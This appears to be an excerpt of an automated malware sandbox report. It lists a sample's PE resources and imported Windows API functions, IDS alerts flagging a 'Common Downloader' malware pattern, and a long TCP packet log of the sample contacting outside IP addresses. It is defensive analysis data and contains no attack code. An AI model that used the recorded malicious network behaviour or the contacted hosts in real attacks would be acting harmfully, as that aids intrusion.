                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                  RT_ICON0x543280x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.3725452502070271
                                                                                                                                                                                  RT_ICON0x64b500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5725103734439834
                                                                                                                                                                                  RT_ICON0x670f80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.676829268292683
                                                                                                                                                                                  RT_ICON0x681a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6172707889125799
                                                                                                                                                                                  RT_ICON0x690480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7436823104693141
                                                                                                                                                                                  RT_ICON0x698f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.5361271676300579
                                                                                                                                                                                  RT_ICON0x69e580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.849290780141844
                                                                                                                                                                                  RT_DIALOG0x6a2c00x100dataEnglishUnited States0.5234375
                                                                                                                                                                                  RT_DIALOG0x6a3c00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                  RT_DIALOG0x6a4e00xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                                                                  RT_DIALOG0x6a5a80x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                  RT_GROUP_ICON0x6a6080x68dataEnglishUnited States0.7211538461538461
                                                                                                                                                                                  RT_VERSION0x6a6700x240dataEnglishUnited States0.5364583333333334
                                                                                                                                                                                  RT_MANIFEST0x6a8b00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                                                                                  DLLImport
                                                                                                                                                                                  ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                                                                                                                  SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                                                                                                                  ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                                                                                                                  COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                                                                                                                  USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                                                                                                                  GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                                                                                                                  KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                  2024-12-02T16:14:55.175759+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449736172.217.19.174443TCP
                                                                                                                                                                                  2024-12-02T16:15:09.022615+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449745132.226.8.16980TCP
                                                                                                                                                                                  2024-12-02T16:15:11.710105+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449745132.226.8.16980TCP
                                                                                                                                                                                  2024-12-02T16:15:13.419750+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449772172.67.177.134443TCP
                                                                                                                                                                                  2024-12-02T16:15:15.100741+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449778132.226.8.16980TCP
                                                                                                                                                                                  2024-12-02T16:15:16.737515+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449779172.67.177.134443TCP
                                                                                                                                                                                  2024-12-02T16:15:23.789550+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449797172.67.177.134443TCP
                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Dec 2, 2024 16:14:52.390362978 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 2, 2024 16:14:52.390398979 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:52.390485048 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 2, 2024 16:14:52.448854923 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 2, 2024 16:14:52.448880911 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:54.245785952 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:54.245999098 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 2, 2024 16:14:54.246519089 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:54.246643066 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 2, 2024 16:14:54.367722988 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 2, 2024 16:14:54.367742062 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:54.368092060 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:54.368177891 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 2, 2024 16:14:54.393762112 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 2, 2024 16:14:54.439327002 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:55.175755024 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:55.175848961 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 2, 2024 16:14:55.176044941 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 2, 2024 16:14:55.176088095 CET44349736172.217.19.174192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:55.176141024 CET49736443192.168.2.4172.217.19.174
                                                                                                                                                                                  Dec 2, 2024 16:14:55.333709002 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:14:55.333744049 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:55.333810091 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:14:55.334381104 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:14:55.334397078 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:57.074708939 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:57.074815035 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:14:57.080291033 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:14:57.080306053 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:57.080550909 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:14:57.080593109 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:14:57.081068039 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:14:57.123333931 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.054001093 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.054090977 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.067625999 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.067691088 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.174009085 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.174108982 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.177918911 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.178661108 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.178877115 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.179039955 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.255140066 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.255218983 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.259032965 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.259087086 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.259126902 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.259164095 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.266942024 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.266998053 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.269999981 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.270049095 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.274059057 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.274113894 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.281692028 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.281749010 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.283023119 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.283068895 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.290968895 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.291018963 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.292289019 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.292337894 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.296849012 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.296896935 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.301301956 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.301350117 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.307419062 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.307465076 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.315643072 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.315710068 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.318380117 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.318427086 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.328713894 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.328767061 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.331821918 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.331870079 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.342190981 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.342240095 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.345299006 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.345345020 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.355839968 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.355918884 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.358879089 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.358932972 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.369292974 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.369343042 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.369437933 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.369482994 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.382846117 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.382905960 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.422883987 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.422950029 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.422957897 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.423006058 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.456186056 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.456247091 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.456310987 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.456387043 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.458349943 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.458523989 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.462687969 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.462759972 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.462766886 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.462807894 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.466902018 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.466952085 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.467046022 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.467094898 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.471283913 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.471339941 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.471446037 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.471489906 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.471497059 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.471541882 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.475430965 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.475478888 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.475536108 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.475578070 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.480771065 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.480820894 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.480978012 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.481019974 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.488339901 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.488390923 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.488558054 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.488610029 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.498347998 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.498408079 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.498413086 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.498456955 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.508694887 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.508766890 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.508826017 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.508867025 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.518774986 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.518836975 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.518884897 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.518929005 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.528523922 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.528577089 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.528803110 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.528853893 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.538587093 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.538649082 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.538755894 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.538805962 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.547996044 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.548047066 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.548110962 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.548163891 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.557497025 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.557566881 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.557611942 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.557662010 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.576426029 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.576472044 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.576562881 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.576603889 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.577975988 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.578032017 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.578131914 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.578176022 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.578180075 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.578218937 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.580519915 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.580564976 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.583187103 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.583240032 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.584414959 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.584465027 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.591531038 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.591579914 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.592653990 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.592699051 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.597758055 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.597801924 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.598942995 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.598994017 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.604011059 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.604055882 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.605148077 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.605206966 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.624254942 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.624301910 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.625515938 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.625566006 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.625571012 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.625608921 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.628789902 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.628838062 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.657442093 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.657505989 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.658190966 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.658232927 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.660698891 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.660779953 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.660804987 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.660849094 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.663291931 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.663345098 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.663352013 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.663398981 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.665802002 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.665859938 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.665999889 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.666043997 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.668412924 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.668459892 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.670905113 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.670953989 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.670974016 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.671016932 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.673588037 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.673645020 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.674684048 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.674725056 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.674832106 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.674870014 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.677082062 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.677130938 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.677174091 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.677217960 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.680104971 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.680155993 CET49737443192.168.2.4142.250.181.129
                                                                                                                                                                                  Dec 2, 2024 16:15:00.680186987 CET44349737142.250.181.129192.168.2.4
                                                                                                                                                                                  Dec 2, 2024 16:15:00.680253029 CET49737443192.168.2.4142.250.181.129
